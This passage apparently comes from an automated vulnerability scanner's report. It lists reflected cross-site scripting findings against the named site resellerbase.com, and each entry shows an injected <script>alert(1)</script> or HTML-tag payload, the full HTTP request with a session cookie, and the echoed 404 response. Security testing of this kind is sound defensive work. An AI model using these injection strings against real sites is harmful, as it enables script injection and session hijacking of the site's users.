<p>The requested URL /detail/20/themes44c0f<script>alert(1)</script>69bd448ba0c/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1695. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7a42d<script>alert(1)</script>2c66a6dc630 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos7a42d<script>alert(1)</script>2c66a6dc630/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos7a42d<script>alert(1)</script>2c66a6dc630/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1696. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload aa6ee<script>alert(1)</script>9567d32e396 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/imagesaa6ee<script>alert(1)</script>9567d32e396/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/imagesaa6ee<script>alert(1)</script>9567d32e396/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1697. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload caf00<script>alert(1)</script>e978a4395b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/ratingcaf00<script>alert(1)</script>e978a4395b/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/ratingcaf00<script>alert(1)</script>e978a4395b/5.gif was not found on this server.</p>
...[SNIP]...

2.1698. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 872bc<script>alert(1)</script>4770be2be7e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/rating/5.gif872bc<script>alert(1)</script>4770be2be7e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/5.gif872bc<script>alert(1)</script>4770be2be7e was not found on this server.</p>
...[SNIP]...

2.1699. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 61727<script>alert(1)</script>e97bc4552d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/rating/5.gif?61727<script>alert(1)</script>e97bc4552d4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:28:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/5.gif?61727<script>alert(1)</script>e97bc4552d4=1 was not found on this server.</p>
...[SNIP]...

2.1700. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa86f<script>alert(1)</script>143dc944661 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailaa86f<script>alert(1)</script>143dc944661/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailaa86f<script>alert(1)</script>143dc944661/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1701. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d496d<script>alert(1)</script>005c10f26ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20d496d<script>alert(1)</script>005c10f26ab/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20d496d<script>alert(1)</script>005c10f26ab/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1702. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dc21a<script>alert(1)</script>fd7a5bd5661 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themesdc21a<script>alert(1)</script>fd7a5bd5661/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themesdc21a<script>alert(1)</script>fd7a5bd5661/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1703. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb056<script>alert(1)</script>9883e25e458 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmoscb056<script>alert(1)</script>9883e25e458/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmoscb056<script>alert(1)</script>9883e25e458/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1704. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 64a38<script>alert(1)</script>c119903dc2d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images64a38<script>alert(1)</script>c119903dc2d/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images64a38<script>alert(1)</script>c119903dc2d/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1705. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3e840<script>alert(1)</script>fac9ebecdd2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/rating3e840<script>alert(1)</script>fac9ebecdd2/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating3e840<script>alert(1)</script>fac9ebecdd2/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1706. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload ffb89<script>alert(1)</script>bb22087ce74 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/rating/search.phpffb89<script>alert(1)</script>bb22087ce74?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/search.phpffb89<script>alert(1)</script>bb22087ce74?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1707. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload ff7e3<a>b9984c2973e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchff7e3<a>b9984c2973e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchff7e3<a>b9984c2973e&opt=2 was not found on this server.</p>
...[SNIP]...

2.1708. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ef585<a>af1e837c1c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/images/rating/search.php?keyword=search...ef585<a>af1e837c1c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/search.php?keyword=search...ef585<a>af1e837c1c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1709. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67007<script>alert(1)</script>19f8400091e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&67007<script>alert(1)</script>19f8400091e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&67007<script>alert(1)</script>19f8400091e=1 was not found on this server.</p>
...[SNIP]...

2.1710. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload cd447<a>d306b4a9eb8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2cd447<a>d306b4a9eb8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2cd447<a>d306b4a9eb8 was not found on this server.</p>
...[SNIP]...

2.1711. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 381a5<script>alert(1)</script>8c95f396ba3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail381a5<script>alert(1)</script>8c95f396ba3/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail381a5<script>alert(1)</script>8c95f396ba3/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1712. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d9eeb<script>alert(1)</script>2a1d6e2596f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20d9eeb<script>alert(1)</script>2a1d6e2596f/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
